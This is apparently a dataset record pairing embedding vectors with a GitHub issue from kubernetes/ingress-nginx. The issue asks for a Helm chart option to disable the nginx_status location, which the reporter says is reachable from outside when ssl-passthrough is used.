0.032422952353954315, 0.00984367448836565, 0.02812677063047886, 0.022509759292006493, -0.01468209084123373, 0.013062333688139915, 0.001656253938563168, 0.017546210438013077, -0.007059499621391296, -0.010921196080744267, 0.00839771144092083, 0.009454376995563507, -0.010809967294335365, -0.015919502824544907, -0.011060230433940887, -0.039513733237981796, 0.005995882209390402, -0.006479029078036547, -0.01647564209997654, 0.009078982286155224, -0.006159248296171427, 0.007059499621391296, -0.01682323031127453, -0.0005396294291131198, 0.014445731416344643, 0.019172919914126396, -0.0294197965413332, -0.0014633429236710072, 0.0055162119679152966, -0.016531256958842278, 0.01439011748880148, -0.004087627865374088, -0.020257392898201942, -0.0017092609778046608, -0.011817971244454384, -0.006593732628971338, 0.010024419985711575, 0.015099195763468742, 0.022148268297314644, -0.010747401975095272, -0.007758150342851877, 0.014932353980839252, -0.004153669346123934, 0.004921837244182825, -0.011428672820329666, 0.008682732470333576, -0.00905812717974186, 0.008147448301315308, -0.0032986043952405453, -0.014654284343123436, -0.0067327674478292465, 0.012999768368899822, -0.006736243609338999, 0.011915295384824276, 0.001080996822565794, 0.004087627865374088, 0.0055231633596122265, -0.020243490114808083, -0.0003825633611995727, 0.00163539859931916, -0.0036114328540861607, -0.008981658145785332, 0.0014346669195219874, -0.008342097513377666, 0.021425286307930946, -0.01710129901766777, -0.0018630684353411198, 0.0015398120740428567, -0.0009184996597468853, 0.0004227531608194113, 0.008036220446228981, 0.00852284301072359, -0.027209140360355377, -0.0016927506076171994, -0.016976168379187584, -0.015641432255506516, 0.004456070251762867, 0.022982478141784668, 0.012068234384059906, -0.005481453146785498, 0.0066041601821780205, 0.014751608483493328, 0.0031195967458188534, 0.005130389705300331, 0.014000819995999336, -0.0008333407458849251, -0.00857150461524725, 0.01418851688504219, 0.006419938988983631, -0.005012209992855787, 0.01001051627099514, 0.002893664874136448, 0.009412666782736778, 0.015919502824544907, 0.0009619480697438121, -0.0068891821429133415, 0.03840145468711853, 0.006037592887878418, 0.010594463907182217, -0.003098741639405489, -0.012798167765140533, 0.004445642698556185, 0.009329245425760746, -0.006704960484057665, -0.0015754398191347718, -0.02198142558336258, 0.010066131129860878, 0.0025200084783136845, -0.021564321592450142, -0.013528101146221161, 0.01878362149000168, -0.004011158365756273, 0.003757419530302286, -0.0328400544822216, 0.0024626567028462887, 0.029558831825852394, -0.011901391670107841, 0.0026851126458495855, -0.0036322881933301687, 0.012624373659491539, 0.02029910311102867, 0.008661877363920212, -0.025902211666107178, -0.022050943225622177, 0.000193345476873219, 0.005610060412436724, -0.012770360335707664, 0.006927416659891605, 0.009357052855193615, -0.0007707750191912055, 0.002424421953037381, 0.02908611297607422, -0.023107608780264854, -0.008223917335271835, 0.011859681457281113, 0.00436222180724144, -0.0062635247595608234, 0.0012313283514231443, 0.01901998184621334, 0.012318496592342854, 0.03398014232516289, 0.009523894637823105, 0.01710129901766777, -0.01878362149000168, 0.009440473280847073, 0.002919733989983797, 0.008495035581290722, 0.01586388796567917, -0.026319317519664764, 0.0004331807722337544, -0.007285431493073702, 0.018588973209261894, -0.01611415110528469, 0.01143562514334917, 0.011706743389368057, 0.01900607906281948, -0.020465945824980736, -0.01468209084123373, -0.012269834987819195, 0.0059715514071285725, 0.014751608483493328, 0.0073966593481600285, -0.005825564730912447, -0.0029423271771520376, 0.02231511101126671, 0.009211065247654915, -0.0019864619243890047, -0.0019464893266558647, -0.00823086965829134, 0.010365055873990059, -0.01839432492852211, 0.005978502798825502, -0.0025495535228401423, -0.010135647840797901, 0.01148428674787283, 0.023163223639130592, -0.021161120384931564, 0.006155772600322962, 0.013813123106956482, -0.01742107979953289, -0.001724902424030006, -0.023093705996870995, 0.021856294944882393, 0.002076834673061967, 0.0030813622288405895, 0.0025095809251070023, 0.02448405511677265, -0.002360118320211768, -0.020799629390239716, -0.0108238710090518, 0.015516300685703754, -0.014570862986147404, 0.013389065861701965, -0.0016319227870553732, 0.021800680086016655, 0.018867043778300285, 0.025930019095540047, -0.01208908949047327, 0.004636815749108791, 0.009440473280847073, 0.011011567898094654, -0.01679542288184166, -0.008675781078636646, 0.01033029705286026, 0.015516300685703754, 0.003388976911082864, 0.0068891821429133415, 0.021230638027191162, 0.005046968813985586, -0.020507656037807465, -0.0012947630602866411, 0.0032742731273174286, 0.011741502210497856, 0.003286438761278987, 0.008620167151093483, 0.016920553520321846, -0.003583625890314579, 0.005328514613211155, -0.0047306641936302185, 0.007174203637987375, -0.004223186522722244, 0.02427550218999386, 0.012770360335707664, -0.004188428167253733, 0.004452594555914402, -0.011296589858829975, 0.0013999082148075104, 0.016350511461496353, -0.009940999560058117, -0.00917630735784769, 0.0011887488653883338, 0.015127003192901611, -0.003253418020904064, 0.0035071566235274076, -0.00041580141987651587, -0.019854191690683365, 0.021494803950190544, 0.04488048329949379, -0.008627118542790413, 0.02716743014752865, 0.021717259660363197, 0.005495356395840645, 0.016225378960371017, 0.0004983533872291446, 0.024164274334907532, 0.018797526136040688, 0.003321197349578142, 0.012763408944010735, -0.003213445423170924, -0.013062333688139915, 0.014320599846541882, -0.0051025827415287495, 0.0029822997748851776, 0.00411543482914567, 0.015585818327963352, -0.0028519544284790754, -0.013611521571874619, 0.03395233675837517, -0.0014033840270712972, -0.02423379197716713, 0.01673980802297592, 0.0059402682818472385, 0.01213775109499693, -0.005481453146785498, -0.011658080853521824, -0.003618384711444378, 0.006805760785937309, 0.026639096438884735, -0.002933637471869588, 0.010858629830181599, -0.002791126724332571, -0.017184719443321228, 0.018616780638694763, -0.011560756713151932, 0.005342418327927589, 0.004355269949883223, -0.01241582166403532, 0.006030641030520201, -0.025081906467676163, -0.002231511054560542, -0.0027893888764083385, -0.0019673446658998728, -0.007869378663599491, 0.005363273434340954, 0.007493983954191208, -0.006211386527866125, -0.018588973209261894, -0.005224238615483046, 0.007897185161709785, -0.000374308176105842, -0.00012610905105248094, 0.021147215738892555, 0.0020907381549477577, 0.02644444815814495, -0.006691057235002518, 0.0028067680541425943, 0.014035578817129135, -0.014723801985383034, -0.029948128387331963, -0.015905598178505898, -0.018575070425868034, 0.004299656022340059, 0.006996933836489916, 0.03461970388889313, -0.011234024539589882, 0.025679755955934525, -0.01839432492852211, -0.00493574095889926, 0.006131441332399845, 0.01612805388867855, 0.013528101146221161, 0.00428227661177516, -0.0002858906227629632, 0.0015528466319665313, 0.0017474956111982465, -0.00868968479335308, 0.013423824682831764, -0.0015571914846077561, -0.012985864654183388, 0.003376811509951949, 0.020271295681595802, 0.0032621074933558702, 0.010191261768341064, -0.010872533544898033, 0.021383576095104218, 0.02844655141234398, 0.005585729144513607, -0.027556728571653366, 0.007980606518685818, -0.005919413175433874, 0.02481773868203163, -0.016072440892457962, 0.008953850716352463, -0.01274255383759737, 0.007438370026648045, 0.004372649360448122, -0.006923940498381853, 0.01422327570617199, 0.0016475642332807183, 0.015266037546098232, 0.0016536469338461757, -0.025930019095540047, -0.020104454830288887, 0.008349048905074596, -0.00011426935088820755, -0.008932995609939098, 0.005158196669071913, 0.00774424709379673, -0.0026642573066055775, -0.02131405845284462, 0.010559705086052418, -0.0017561853164806962, 0.001446832437068224, 0.021397478878498077, -0.011539901606738567, 0.016350511461496353, 0.014084240421652794, -0.006009785924106836, 0.026722518727183342, 0.002413994399830699, 0.006155772600322962, -0.01678151823580265, 0.03353523090481758, 0.024970678612589836, -0.019576121121644974, 0.0015198258915916085, 0.008717491291463375, -0.013298693113029003, -0.006173152010887861, -0.010858629830181599, 0.016656387597322464, -0.0011974385706707835, -0.005978502798825502, -0.0015945570776239038, 0.0076052118092775345, 0.006433842703700066, 0.04254469648003578, 0.006645870860666037, 0.0067292917519807816, 0.00428227661177516, -0.015933405607938766, 0.011338300071656704, 0.014320599846541882, -0.008216965943574905, 0.03981960937380791, 0.009725495241582394, 0.01372275035828352, -0.010615319013595581, -0.02448405511677265, -0.012812071479856968, 0.004960071761161089, -0.0014103357680141926, -0.012436676770448685, 0.024928966537117958, -0.017629632726311684, -0.01001051627099514, -0.007236769422888756, -0.002997941104695201, -0.019311955198645592, 0.0046820021234452724, 0.0026242847088724375, -0.006718864198774099, -0.0007538301288150251, 0.0014902809634804726, -0.006346945650875568, 0.02358032763004303, 0.004643767606467009, 0.013868737034499645, 0.001462473883293569, -0.0024313738103955984, 0.026291510090231895, 0.005877702496945858, 0.002707705833017826, -0.03520365059375763, 0.009690736420452595, -0.009920143522322178, 0.011838826350867748, -0.00006435797695303336, 0.01065007783472538, 0.008717491291463375, 0.008272579871118069, 0.01308318879455328, 0.0037400403525680304, -0.014042530208826065, -0.001843951060436666, 0.008189158514142036, -0.0029423271771520376, -0.019937612116336823, -0.016934458166360855, 0.025957826524972916, 0.0028589062858372927, 0.0037157090846449137, 0.0012278524227440357, 0.023733267560601234, 0.0027494162786751986, 0.013333451934158802, -0.011421721428632736, 0.019784674048423767, -0.0038408406544476748, -0.02189800515770912, 0.00016380054876208305, 0.003284700680524111, 0.007924992591142654, -0.01242277305573225, -0.0024765601847320795, -0.003906882368028164, 0.006649346556514502, -0.001248707645572722, -0.008307338692247868, 0.00218111090362072, 0.021884102374315262, 0.017170816659927368, -0.002274959348142147, 0.0044386908411979675, -0.005665674339979887, -0.004045917186886072, 0.0009497825521975756, -0.0011209693038836122, 0.010295538231730461, -0.01836651749908924, 0.009920143522322178, 0.009920143522322178, -0.014695994555950165, -0.012061282061040401, 0.024303309619426727, -0.015710949897766113, 0.014459635131061077, -0.003428949508816004, 0.010100889019668102, 0.002433111658319831, -0.021536514163017273, -0.004250993952155113, -0.019784674048423767, -0.0010288587072864175, 0.01143562514334917, -0.001015824149362743, -0.0013025837251916528, 0.0061801038682460785, 0.006346945650875568, -0.005884654354304075, -0.008057075552642345, -0.006611112039536238, 0.011588563211262226, 0.005074775777757168, 0.012235076166689396, 0.010399814695119858, -0.02326054871082306, 0.02420598641037941, -0.019784674048423767, 0.0021776349749416113, 0.01871410571038723, -0.015474590472877026, -0.012638277374207973, 0.006242669653147459, 0.005404983647167683, 0.0006074089324101806, -0.008425517939031124, -0.02199533022940159, -0.0009158927714452147, -0.001977772219106555, -0.011386962607502937, 0.015710949897766113, 0.012902443297207355, 0.008008413016796112, 0.0019412755500525236, 0.0014598669949918985, 0.019506603479385376, -0.01147038396447897, 0.007646922487765551, 0.010226020589470863, 0.0065207392908632755, 0.028669007122516632, -0.01618366874754429, 0.02228730358183384, -0.022509759292006493, -0.017017878592014313, 0.005213810596615076, 0.014251083135604858, 0.0177964735776186, 0.006211386527866125, -0.004873175173997879, -0.0016519090859219432, 0.005384128540754318, 0.027987735345959663, -0.018853139132261276, 0.04318425804376602, -0.018227482214570045, -0.012367159128189087, -0.023997433483600616, 0.006096682511270046, -0.008064026944339275, -0.0005969813209958375, -0.010670932941138744, -0.004327462986111641, 0.00041449794662185013, 0.026347123086452484, 0.028293613344430923, -0.012791215442121029, -0.019937612116336823, 0.0019656065851449966, 0.0036670470144599676, 0.010295538231730461, -0.010830823332071304, 0.009364004246890545, -0.005119962152093649, 0.014904547482728958, -0.0029718722216784954, 0.01771305315196514, 0.005929840728640556, 0.019200727343559265, 0.0011009830050170422, 0.006468601059168577, -0.0015259085921570659, -0.01402862649410963, -0.022078750655055046, 0.021731162443757057, -0.00499830674380064, 0.0010401553008705378, 0.019770771265029907, 0.0014494394417852163, 0.008411615155637264, 0.011720646172761917, 0.012499242089688778, 0.01675371266901493, 0.014431828632950783, 0.014765512198209763, -0.012221172451972961, 0.004247517790645361, 0.013013672083616257, 0.01742107979953289, -0.0012530524982139468, -0.009607315063476562, 0.007952799089252949, -0.010448477230966091, 0.016572967171669006, 0.00685094716027379, 0.005950695835053921, -0.005544018931686878, -0.0026312365662306547, 0.00035714602563530207, -0.00853674579411745, -0.00013360389857552946, 0.027946025133132935, 0.0008268234669230878, 0.011894440278410912, 0.006645870860666037, 0.011720646172761917, 0.0005908985622227192 ]
null
null
null
null
null
null
null
null
null
[ "kubernetes", "ingress-nginx" ]
<!-- What do you want to happen? --> At the moment the nginx_status location configuration is being automatically enabled when deploying ingress-nginx via helm chart. This is not an issue in itself but when using ssl-passthrough for mtls communication, we are able to access the block from outside. I would like to be able to change that configuration directly from the helm chart instead of from the container. Even just an extra arg for disabling it will suffice for now imo, until this can be addressed fully. Thanks for taking this into account! Best wishes! <!-- Is there currently another issue associated with this? --> Im not aware of any. <!-- Does it require a particular kubernetes version? --> No <!-- If this is actually about documentation, uncomment the following block --> ![image](https://github.com/kubernetes/ingress-nginx/assets/65494920/abe00eb4-fae2-45f9-8aa9-00e1e2d6e5aa) <!-- /kind documentation /remove-kind feature -->
nginx_status block configuration
https://api.github.com/repos/kubernetes/ingress-nginx/issues/11369/comments
12
2024-05-17T10:17:22
2024-08-07T15:07:54Z
https://github.com/kubernetes/ingress-nginx/issues/11369
2,302,343,615
11,369
false
This is a GitHub Issue repo:ingress-nginx owner:kubernetes Title : nginx_status block configuration Issue date: --- start body --- <!-- What do you want to happen? --> At the moment the nginx_status location configuration is being automatically enabled when deploying ingress-nginx via helm chart. This is not an issue in itself but when using ssl-passthrough for mtls communication, we are able to access the block from outside. I would like to be able to change that configuration directly from the helm chart instead of from the container. Even just an extra arg for disabling it will suffice for now imo, until this can be addressed fully. Thanks for taking this into account! Best wishes! <!-- Is there currently another issue associated with this? --> Im not aware of any. <!-- Does it require a particular kubernetes version? --> No <!-- If this is actually about documentation, uncomment the following block --> ![image](https://github.com/kubernetes/ingress-nginx/assets/65494920/abe00eb4-fae2-45f9-8aa9-00e1e2d6e5aa) <!-- /kind documentation /remove-kind feature --> --- end body ---
1,114
[ 0.016777392476797104, -0.005662206560373306, -0.00884638074785471, -0.0018879470881074667, 0.022792670875787735, -0.032665569335222244, -0.011193646118044853, 0.04053773730993271, -0.0027232207357883453, -0.041060805320739746, -0.014122825115919113, 0.021158084273338318, -0.008009472861886024, -0.006806416902691126, -0.002036694437265396, -0.0008712344570085406, -0.0013354569673538208, 0.009951360523700714, 0.017810450866818428, 0.0008982050931081176, 0.02774873562157154, -0.0060218158178031445, -0.020687323063611984, 0.032953258603811264, -0.0018634282751008868, 0.004413382615894079, -0.02594415284693241, 0.013312069699168205, -0.06606343388557434, -0.013848214410245419, 0.01107595581561327, 0.03889007493853569, -0.01715661771595478, 0.03522860258817673, -0.012318241409957409, 0.0209096260368824, 0.04208078607916832, 0.03415631502866745, -0.014972809702157974, 0.007394867949187756, -0.029030250385403633, -0.043833062052726746, 0.023642655462026596, -0.004187809769064188, -0.008807150647044182, 0.006714880000799894, -0.01331860851496458, -0.01511665340512991, -0.009480600245296955, -0.004730492364615202, 0.004710877314209938, -0.0348101481795311, -0.033659398555755615, -0.04443459212779999, -0.001999099040403962, -0.05309135839343071, 0.00863061472773552, -0.01527357380837202, -0.009238680824637413, 0.03426092863082886, -0.033502478152513504, 0.04025005176663399, -0.015561260282993317, 0.026244916021823883, 0.006734495051205158, -0.00717910286039114, -0.0208965502679348, -0.01122633833438158, -0.05549747124314308, 0.03080868162214756, -0.05795588716864586, 0.053143665194511414, 0.009748672135174274, -0.0002519305853638798, 0.037974707782268524, 0.004880874417722225, 0.034627072513103485, 0.001265987055376172, 0.013573603704571724, 0.008277544751763344, -0.040223896503448486, 0.01991579867899418, -0.056805141270160675, -0.00584854930639267, 0.02674183063209057, -0.011376719921827316, -0.009297526441514492, -0.03998851776123047, -0.013135534711182117, -0.015365110710263252, -0.021707305684685707, 0.012095937505364418, -0.003968775272369385, -0.046343788504600525, 0.03862854093313217, 0.005364711862057447, -0.04137464612722397, 0.004521265625953674, -0.03426092863082886, 0.011527101509273052, 0.003416285151615739, 0.019706571474671364, 0.009532907046377659, 0.011651330627501011, 0.025551851838827133, 0.014619738794863224, 0.03360709175467491, -0.020425789058208466, -0.007682555355131626, 0.06512191146612167, 0.01782352849841118, -0.02493724785745144, -0.012972076423466206, 0.0017506418516859412, -0.015953561291098595, 0.0348624549806118, -0.006365078501403332, 0.014776659198105335, -0.014881272800266743, 0.0167250856757164, -0.01262554433196783, -0.001847082399763167, 0.024361873045563698, -0.029370244592428207, -0.029788699001073837, 0.005083563271909952, -0.026964133605360985, 0.0011409411672502756, 0.021079624071717262, -0.020870396867394447, -0.00048588073696009815, -0.0012545449426397681, 0.0061525823548436165, 0.00017510504403617233, 0.002054674783721566, 0.03781778737902641, -0.016058174893260002, -0.004799145273864269, -0.02968408539891243, -0.014868196099996567, -0.03271787613630295, -0.052202146500349045, -0.018647359684109688, 0.005204522516578436, -0.0005831386079080403, 0.01688200607895851, 0.03125328943133354, 0.0015209824778139591, -0.013547450304031372, 0.0229888204485178, 0.000540230714250356, -0.01205016952008009, 0.003661473048850894, 0.023773422464728355, 0.05905432999134064, -0.022753439843654633, -0.03541167452931404, 0.006714880000799894, -0.032665569335222244, -0.008120624348521233, -0.0007208525203168392, -0.04103465378284454, -0.037137798964977264, 0.024034956470131874, 0.04268231615424156, 0.013926674611866474, 0.003818393452093005, 0.016685856506228447, 0.0021429425105452538, 0.01867351308465004, 0.0271733608096838, -0.009153682738542557, -0.027408741414546967, -0.03494091331958771, -0.010618272237479687, -0.026257993653416634, -0.012442470528185368, -0.01185401901602745, 0.023917265236377716, -0.030181000009179115, -0.02759181521832943, 0.035882435739040375, -0.013168226927518845, -0.04762530326843262, 0.0013542546657845378, 0.009820593520998955, -0.049534499645233154, 0.017941217869520187, 0.02761796861886978, -0.04527150094509125, -0.01546972431242466, 0.006361809559166431, 0.011409412138164043, -0.021354233846068382, -0.013495143502950668, 0.035751670598983765, -0.025578005239367485, -0.050371408462524414, 0.01685585267841816, -0.015352034009993076, 0.0195104219019413, 0.0006088833906687796, -0.019745800644159317, -0.039517756551504135, -0.06193120405077934, 0.039099302142858505, -0.02785334922373295, 0.028690258041024208, -0.014188208617269993, -0.032142505049705505, -0.041740793734788895, -0.012592852115631104, -0.0005888596642762423, 0.02451879344880581, -0.01163171511143446, 0.02607491984963417, -0.0064043086022138596, 0.007126796059310436, -0.018320443108677864, -0.03151482343673706, 0.028271803632378578, -0.038393162190914154, -0.003125328803434968, 0.02412649244070053, -0.044931504875421524, 0.03303171694278717, -0.014645892195403576, -0.04754684492945671, 0.017627377063035965, -0.02984100580215454, 0.01339052990078926, -0.0014433396281674504, 0.006976414006203413, 0.01527357380837202, 0.021288851276040077, -0.00969636533409357, 0.011585947126150131, 0.024440333247184753, 0.035045526921749115, -0.025185704231262207, 0.015927407890558243, 0.02284497767686844, -0.045794568955898285, -0.016123557463288307, -0.05139138922095299, 0.0188042800873518, -0.007538711652159691, 0.02314574085175991, 0.024571100249886513, 0.027984116226434708, -0.05105139687657356, 0.009925207123160362, 0.021367311477661133, -0.006593920756131411, 0.012102476321160793, -0.012102476321160793, -0.04932527244091034, -0.01767968386411667, 0.028350263833999634, -0.03611781820654869, 0.015665873885154724, 0.00946752354502678, 0.0029553319327533245, 0.03564705699682236, 0.004825298674404621, -0.06920184195041656, 0.00466837827116251, 0.030076386407017708, 0.010579042136669159, 0.031017908826470375, -0.0004082379164174199, -0.020582709461450577, -0.03753009811043739, 0.07417098432779312, -0.0022622672840952873, 0.002276978688314557, 0.014345129020512104, 0.0024191876873373985, 0.00829715933650732, -0.0026888942811638117, -0.0032544611021876335, 0.012095937505364418, -0.008153315633535385, 0.024008803069591522, -0.012135167606174946, 0.024453409016132355, -0.0019565997645258904, -0.026022613048553467, -0.05392826721072197, -0.02339419722557068, -0.03256095573306084, 0.008382158353924751, 0.003991659730672836, 0.008166392333805561, 0.0018552553374320269, 0.01754891686141491, -0.03146251663565636, 0.016489705070853233, -0.004838375374674797, 0.04302230849862099, -0.02368188463151455, 0.03640550374984741, -0.019693493843078613, 0.030756374821066856, -0.02552569843828678, 0.009304064325988293, 0.01756199449300766, 0.02172038145363331, -0.03235172852873802, -0.016646625474095345, 0.024440333247184753, -0.008924840949475765, 0.02884717658162117, -0.021968837827444077, -0.010834037326276302, 0.03564705699682236, 0.04723300412297249, 0.03195942938327789, -0.045349959284067154, 0.015678951516747475, -0.02395649626851082, -0.02008579485118389, -0.015705104917287827, 0.003668011398985982, -0.03802701458334923, -0.04446074366569519, 0.0222826786339283, -0.02981485240161419, -0.011376719921827316, -0.027147207409143448, -0.028611797839403152, 0.05238521844148636, -0.016097404062747955, -0.04362383857369423, -0.020700398832559586, -0.05591592565178871, -0.03389478102326393, 0.01450204849243164, 0.005436633713543415, -0.03692857176065445, 0.015286650508642197, -0.013534373603761196, 0.02678105980157852, -0.001776795252226293, 0.0320640429854393, -0.009513291530311108, -0.012265934608876705, 0.03805316612124443, 0.043702296912670135, -0.012037092819809914, 0.0007004201761446893, 0.02147192507982254, 0.011409412138164043, 0.011684021912515163, 0.04142695292830467, 0.0014752140268683434, 0.0058943177573382854, 0.0025107243563979864, -0.010781730525195599, -0.033371713012456894, 0.05199291929602623, -0.05131293088197708, -0.029605625197291374, 0.018725819885730743, 0.0005063130520284176, 0.025878768414258957, -0.02981485240161419, 0.0014229073422029614, -0.0005921288393437862, -0.0034457077272236347, -0.035751670598983765, -0.02287113107740879, 0.005976047366857529, -0.013665140606462955, 0.006345463450998068, -0.024728020653128624, -0.0032413844019174576, -0.0005369615973904729, -0.024858787655830383, 0.033267099410295486, -0.0072248708456754684, 0.027539508417248726, 0.021524231880903244, -0.015064346604049206, 0.012710542418062687, 0.030468687415122986, 0.013344761915504932, 0.03010253980755806, 0.03705933690071106, 0.00512606231495738, -0.011925941333174706, 0.02509416826069355, 0.002889948431402445, -0.05029295012354851, -0.02102731727063656, 0.01825505867600441, -0.048174526542425156, -0.022792670875787735, 0.004128964617848396, -0.013227071613073349, 0.033371713012456894, -0.004236847627907991, 0.005488940514624119, 0.02701644040644169, -0.026310300454497337, -0.00044583340059034526, -0.03473168611526489, -0.004907027818262577, -0.012802079319953918, -0.027147207409143448, 0.01826813630759716, -0.04234232008457184, -0.037007030099630356, 0.021380387246608734, 0.04820067808032036, 0.060989681631326675, -0.022465752437710762, -0.023799575865268707, -0.004030889365822077, -0.002899755956605077, 0.02548646740615368, 0.00891176424920559, -0.009094838052988052, -0.017928142100572586, 0.021694228053092957, -0.015652798116207123, 0.029213324189186096, 0.020713476464152336, 0.04851451888680458, -0.016084328293800354, -0.026414914056658745, 0.002567935036495328, 0.00046013601240701973, -0.048436056822538376, -0.00829062145203352, -0.005204522516578436, -0.005551054608076811, -0.026101073250174522, -0.004334922414273024, -0.0015316072385758162, -0.047049928456544876, -0.012651696801185608, -0.012017478235065937, 0.005001833662390709, 0.012632082216441631, 0.010546349920332432, -0.03653627261519432, -0.005407211370766163, -0.03384247422218323, -0.004321845714002848, -0.008473695255815983, 0.03297941014170647, -0.020295022055506706, 0.003164558904245496, -0.007466789800673723, -0.020321175456047058, 0.02981485240161419, -0.01527357380837202, 0.0543990284204483, -0.007512558251619339, -0.036745499819517136, 0.020308099687099457, 0.0050051030702888966, 0.0222826786339283, 0.0007441453635692596, -0.0021380388643592596, -0.017601223662495613, -0.02939639799296856, 0.029919466003775597, -0.04276077449321747, -0.000052153514843666926, 0.02814103662967682, 0.03441784903407097, 0.0002827834105119109, -0.0011564696906134486, 0.031854815781116486, 0.011684021912515163, -0.02050424925982952, -0.019863491877913475, -0.00617219740524888, 0.042159248143434525, 0.02033425308763981, 0.013992058113217354, -0.0174312274903059, -0.038550082594156265, -0.028324110433459282, 0.010297893546521664, 0.02662413939833641, -0.01435820572078228, -0.008800611831247807, 0.05649130046367645, -0.018438132479786873, 0.017208924517035484, -0.019745800644159317, 0.019588880240917206, -0.011344028636813164, 0.03836700692772865, -0.007525634951889515, 0.040223896503448486, -0.03405170142650604, -0.020177332684397697, 0.020281946286559105, 0.025473391637206078, -0.05685744807124138, 0.00933675654232502, 0.020935779437422752, -0.00669526495039463, 0.013822061009705067, -0.015508954413235188, 0.014462818391621113, -0.021707305684685707, 0.006051238160580397, 0.004416652023792267, -0.045768413692712784, 0.008454079739749432, -0.004249924328178167, -0.00904906913638115, -0.03243019059300423, 0.0488022044301033, 0.015848947688937187, -0.006325848400592804, -0.012553622014820576, -0.011527101509273052, 0.014148978516459465, -0.0008418118814006448, 0.03528090938925743, 0.02399572543799877, -0.02172038145363331, -0.029448704794049263, -0.010016744025051594, -0.02215191163122654, -0.04393767565488815, -0.0064043086022138596, 0.03133174777030945, -0.01658124290406704, 0.029030250385403633, -0.005626245867460966, -0.0032168657053261995, 0.018333518877625465, 0.0333978645503521, -0.019706571474671364, 0.03154097497463226, -0.017954295501112938, -0.005953162908554077, -0.02675490640103817, -0.011788635514676571, -0.019484268501400948, 0.015692027285695076, 0.010860190726816654, -0.019471190869808197, 0.01841197907924652, -0.012285550124943256, -0.003393400926142931, 0.022962667047977448, -0.030782528221607208, -0.013416683301329613, 0.06428501009941101, 0.05141754448413849, 0.0030386957805603743, -0.011265568435192108, -0.00914060603827238, -0.018477361649274826, -0.01994195207953453, -0.009944822639226913, -0.0188042800873518, -0.01400513481348753, -0.00871561374515295, -0.014972809702157974, 0.010049436241388321, -0.011880172416567802, 0.005273174960166216, -0.0006979682948440313, 0.0074079446494579315, -0.007970242761075497, -0.017078157514333725, 0.011605561710894108, 0.0031498477328568697, 0.015561260282993317, 0.0076171718537807465, 0.01052019651979208, -0.01839890144765377, -0.009552521631121635, 0.0031776356045156717, 0.016934312880039215, -0.010971342213451862, -0.01338399201631546, -0.02062194049358368, -0.005034525413066149, 0.019837338477373123, -0.01658124290406704, 0.02855949103832245, -0.004106080625206232, 0.01573125831782818, -0.008349466137588024, 0.014475895091891289, 0.003089367877691984, -0.0013893982395529747, 0.018581975251436234, 0.010696732439100742, 0.005381057970225811, -0.046317633241415024, 0.012795540504157543, -0.005041063763201237, -0.03148866817355156, 0.029579471796751022, 0.01839890144765377, -0.03656242415308952, 0.03012869320809841, 0.015848947688937187, 0.0005667927907779813, -0.03161943703889847, -0.006430462002754211, 0.06339579075574875, -0.02939639799296856, -0.015639720484614372, -0.008016010746359825, 0.03917776048183441, 0.014685122296214104, 0.03473168611526489, -0.019824260845780373, 0.0034457077272236347, -0.018307365477085114, 0.04532380774617195, -0.018451208248734474, 0.050554484128952026, 0.00013311661314219236, 0.009617905132472515, -0.016803545877337456, 0.003305133432149887, -0.008205622434616089, -0.05047602206468582, 0.0074210213497281075, 0.0006521999021060765, -0.02897794358432293, -0.02342035062611103, 0.005789704155176878, 0.00603489251807332, 0.0008859457448124886, -0.02453186921775341, -0.021772688254714012, -0.01660739630460739, 0.02200806885957718, -0.031017908826470375, 0.03640550374984741, -0.020151179283857346, -0.005413749720901251, 0.014462818391621113, 0.004511457867920399, 0.0015953561523929238, 0.011939018033444881, 0.03263941779732704, 0.004782799165695906, -0.007662940304726362, 0.00857830885797739, 0.013861291110515594, 0.0032021543011069298, 0.0037105106748640537, 0.012972076423466206, -0.020739629864692688, -0.03331940621137619, -0.03535936772823334, -0.005423557013273239, -0.005116255022585392, 0.001552856876514852, -0.008238314650952816, -0.005757012404501438, -0.005315674468874931, 0.011317875236272812, 0.005828934255987406, 0.04503611847758293, 0.00024355333880521357, -0.04406844452023506, 0.02648029662668705, -0.010526735335588455, -0.009683288633823395, -0.007682555355131626, -0.004380690865218639, 0.018477361649274826, -0.018307365477085114, -0.006950260605663061, -0.0012055073166266084, 0.007787168491631746, -0.016816623508930206, 0.024322642013430595, -0.031122520565986633, -0.00012545449135359377, 0.0070744892582297325, 0.013913597911596298, -0.014318975619971752, 0.00006487264181487262, 0.003074656706303358, -0.018503515049815178, -0.003860892727971077, -0.04548072814941406, 0.025342624634504318, 0.018464285880327225, 0.01218747440725565, 0.007558326702564955, -0.003664742223918438, 0.0061460440047085285, -0.009885977022349834, 0.012056708335876465, -0.009035992436110973, 0.004861259367316961, 0.012887077406048775, 0.024636482819914818, -0.008545616641640663, 0.013795907609164715, -0.009683288633823395, 0.003838008502498269, -0.016215095296502113, -0.040197744965553284, -0.01331860851496458, 0.02131500467658043, -0.019288117066025734, 0.02634952962398529, 0.0045441496185958385, -0.008604462258517742, -0.029474858194589615, 0.014815889298915863, -0.027094900608062744, -0.008964071050286293, -0.031697895377874374, -0.019745800644159317, 0.003393400926142931, 0.012789002619683743, 0.013416683301329613, 0.03133174777030945, 0.00525682931765914, 0.020399635657668114, -0.004952796269208193, 0.02134115807712078, 0.03245634213089943, -0.0032021543011069298, -0.019955027848482132, -0.0013567066052928567, 0.008257929235696793, -0.00617219740524888, 0.028794869780540466, -0.05173138529062271, 0.001781699014827609, -0.007466789800673723, 0.01660739630460739, -0.01646355167031288, -0.01094518881291151, 0.020308099687099457, -0.018869662657380104, -0.005799511913210154, -0.015862025320529938, 0.01965426467359066, 0.04568995535373688, 0.001542232115752995, -0.0083560049533844, -0.034234773367643356, 0.0044885738752782345, 0.012802079319953918, 0.02730412781238556, 0.023224201053380966, 0.021929608657956123, 0.012514391914010048, 0.02147192507982254, 0.007492943201214075, -0.014083595015108585, 0.022648826241493225, 0.0016272305510938168, -0.0009586848318576813, -0.00623758090659976, -0.011474795639514923, 0.02410033904016018, -0.012416317127645016, -0.013560527004301548, -0.0007735679391771555, -0.041060805320739746, -0.039256222546100616, -0.032534804195165634, 0.013220533728599548, -0.023028049618005753, -0.013861291110515594, -0.012285550124943256, 0.00011646426719380543, -0.0075975568033754826, -0.010611733421683311, -0.016097404062747955, 0.03873315453529358, -0.018215829506516457, -0.022936513647437096, -0.0021838070824742317, -0.01074250042438507, -0.011762482114136219, 0.00035511385067366064, 0.0058812410570681095, -0.00982713233679533, 0.027957962825894356, -0.0037857017014175653, 0.039910055696964264, -0.02492417022585869, -0.010722885839641094, 0.004537611268460751, -0.03389478102326393, -0.005966239608824253, -0.01191286463290453, -0.005132600665092468, 0.017444303259253502, 0.018438132479786873, -0.02552569843828678, 